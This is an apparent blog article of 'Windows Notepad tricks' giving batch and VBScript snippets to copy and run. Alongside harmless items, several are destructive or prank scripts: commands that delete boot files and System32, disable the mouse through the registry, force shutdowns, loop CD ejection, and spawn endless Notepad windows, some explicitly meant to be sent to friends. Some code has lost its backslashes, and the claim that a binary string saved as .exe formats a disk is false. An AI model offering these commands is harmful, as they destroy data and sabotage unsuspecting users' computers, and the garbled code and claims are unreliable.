The Best Windows Notepad Tricks & hacks

Windows notepad tricks – Windows is the best operating system at the lowest price. This operating system hides more tips and hacks inside, so in this article, I’ll explore a hack called “Notepad Hack

Notepad is one of the simpler Windows tools, it is mainly used for taking small notes, but now we are used to hacking and exploring hidden tricks.

List of windows notepad tricks

1. Make a personal log-Book

Now copy the below code and past it into the notepad and save it as “log.tex

									.LOG				

The Best Windows Notepad Tricks & hacks

Now every time you open this note file, You will have all the log details with data and time.

2. Test Antivirus Windows Notepad Tricks

By using this below code you can check your antivirus software

									X5O!P%@AP[4PZX54(P^) 7CC)7}$EICAR-STANDARD- ANTIVIRUS-TEST-FILE!$H+H*				

copy paste this code into your notepad and save it as “test.exe“. after that click saved “text.exe” file, this will check your antivirus software perfectly work or not, if not change your antivirus

3. Continually pop out CD Drive

This one of the best notepad trick to continually pop up the cd drive whenever you try to close it. Just copy paste the below code in your notepad and save it as “cd.vbs” 

									Set oWMP = CreateObject(“WMPlayer.OCX.7″)Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop				

After save it, click the cd.vbs file you can see the cd drive pop up loop. if you need to close this loop you press “Ctrl + Alt +Delete

4. Constantly Repeat Any Messages

This is one of the Best Notepad tricks that will repeat any of the messages on the computer screen repeatedly. Just copy the below code and paste in the notepad and save it as “message.bat”.

									@ECHO off:Beginmsg * Himsg * Are you having fun?msg * I am!msg * Lets have fun together!msg * Because you have been o-w-n-e-dGOTO BEGIN				

5. Keyboard hack type slowly

Once you execute this script it will slow down your typing speed on windows screen. Just copy paste the below code on your notepad and save it with “anyname.vbs

									WScript.Sleep 180000WScript.Sleep 10000Set WshShell = WScript.CreateObject (“WScript.Shell”)WshShell.Run “notepad”WScript.Sleep 100WshShell.AppActivate Notepad“”WScript.Sleep 500WshShell.SendKeys “Hel”WScript.Sleep 500WshShell.SendKeys “lo ”WScript.Sleep 500WshShell.SendKeys “, ho”WScript.Sleep 500WshShell.SendKeys “w a”WScript.Sleep 500WshShell.SendKeys “re ”WScript.Sleep 500WshShell.SendKeys “you”WScript.Sleep 500WshShell.SendKeys “? ”WScript.Sleep 500WshShell.SendKeys “I a”WScript.Sleep 500WshShell.SendKeys “m g”WScript.Sleep 500WshShell.SendKeys “ood”WScript.Sleep 500WshShell.SendKeys ” th”WScript.Sleep 500WshShell.SendKeys “ank”WScript.Sleep 500WshShell.SendKeys “s! “				

6. Shutdown message Windows Notepad Tricks

Just copy the below code and paste in the notepad and save its as “name.bat”.

									@echo offmsg * Hey how are youshutdown -c “Error! You are really a stupid!” -s				

7. Format Hard disk

This is very dangerous because, if you execute this script on your windows, your hard disk data formatted completely. So do it with your own risk.

Copy paste the below code into your notepad and save it with “Name.exe

									01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000				

8. Matrix effect Windows Notepad Tricks

The below code will give you a matrix effect on your screen. so type the below code in your notepad and save it as “matrix.bat

									@echo offcolor 02:startecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto start				

The Best Windows Notepad Tricks & hacks

9. Convert Text Into Audio

This is a very cool notepad trick and this code will convert your text into an audio file. Just copy the below code and paste it into notepad and save it as “text-to-audio.vbs

									Dim message, sapi message=InputBox(“Enter your text for conversion–Tech-viral”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message				

The Best Windows Notepad Tricks & hacks

10. LED Dance of Keyboard

Simply open Notepad and enter the following code and save the file as “LEDDance.vbs”. Once you open the saved file, you will see all three LED lights of a keyboard will start to blink repeatedly.

									Set wshShell =wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “{CAPSLOCK}”wshshell.sendkeys “{NUMLOCK}”wshshell.sendkeys “{SCROLLLOCK}”loop				

11. Open Notepad continuously

You just copy paste this below code into your notepad and save it with “note.bat” name. now send this file into your friends, if your friend click the file, the notepad open continuously.

									@ECHO OFF:TOPSTART %SYSTEMROOT%SYSTEM32NOTEPAD.EXEGOTO TOP				

12. Disable mouse control

Well, you should never try this on your computer, because this method disables the mouse controls on your computer.

									rem Disable Mouseset key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4				

13. Hit enter continuously

This trick will let you use the function of the enter button to happen again and again. Well, you just need to copy and paste the following code into the notepad and save it with “note.bat

									Set wshShell = wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “~(enter)”loop				

14. Deleting startup files in Windows Notepad Tricks

Well, Don’t try this method on your computer unless you are willing to lose all your data. This code will remove your computer startup files so use with your own risk.

Copy and paste the below code into your notepad and save it with “any-name.bat” name.

									@ECHO OFFATTRIB -R -S -H C:AUTOEXEC.BATDEL C:AUTOEXEC.BATATTRIB -R -S -H C:BOOT.INIDEL C:BOOT.INIATTRIB -R -S -H C:NTLDRDEL C:NTLDRATTRIB -R -S -H C:WINDOWSWIN.INIDEL C:WINDOWSWIN.INI				

15. Hit backspace continuously

Well, this is funniest one you can do with no fear. Once you execute the below code on your computer the backspace button will work on continuously.

Just copy and past the below code into your notepad and save it as “any-name.vbs” name

									MsgBox “Backspace again and again and AGAIN”Set wshShell =wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “{bs}”loop				

16. Deleting system32 Files

Well, this is another notepad trick to devastate a PC. This notepad trick will delete System32 files leading to system failure. It’s not advisable to implement the trick, but this code has the power to shut down any working computer within minutes.

Make sure to save the notepad file as .bat file format.

									DEL C:WINDOWSSYSTEM32*.*/Q				

17. Force windows to shut down

This is another notepad trick that will forcefully shut down your computer. You just need to enter the given code into the notepad and save it as .bat format. Here’s the code.

Make sure to save the notepad in .bat format

									@echo offshutdown computer-c “sleep tight” -s				

18. Erase Texts Automatically

Want to annoy your friends by increasing the type anyway? Then there’s an easy way to do this by typing a simple line of code into your Notepad file. Ask your friends to type anything in the Notepad interface that opens after opening this .vbs file and nurtures the look of their face buffet.

									MsgBox “Backspace again and again and AGAIN”Set wshShell =wscript.CreateObject(“WScript.Shell”)dowscript.sleep 100wshshell.sendkeys “{bs}”loop				

Post a Comment

Previous Post Next Post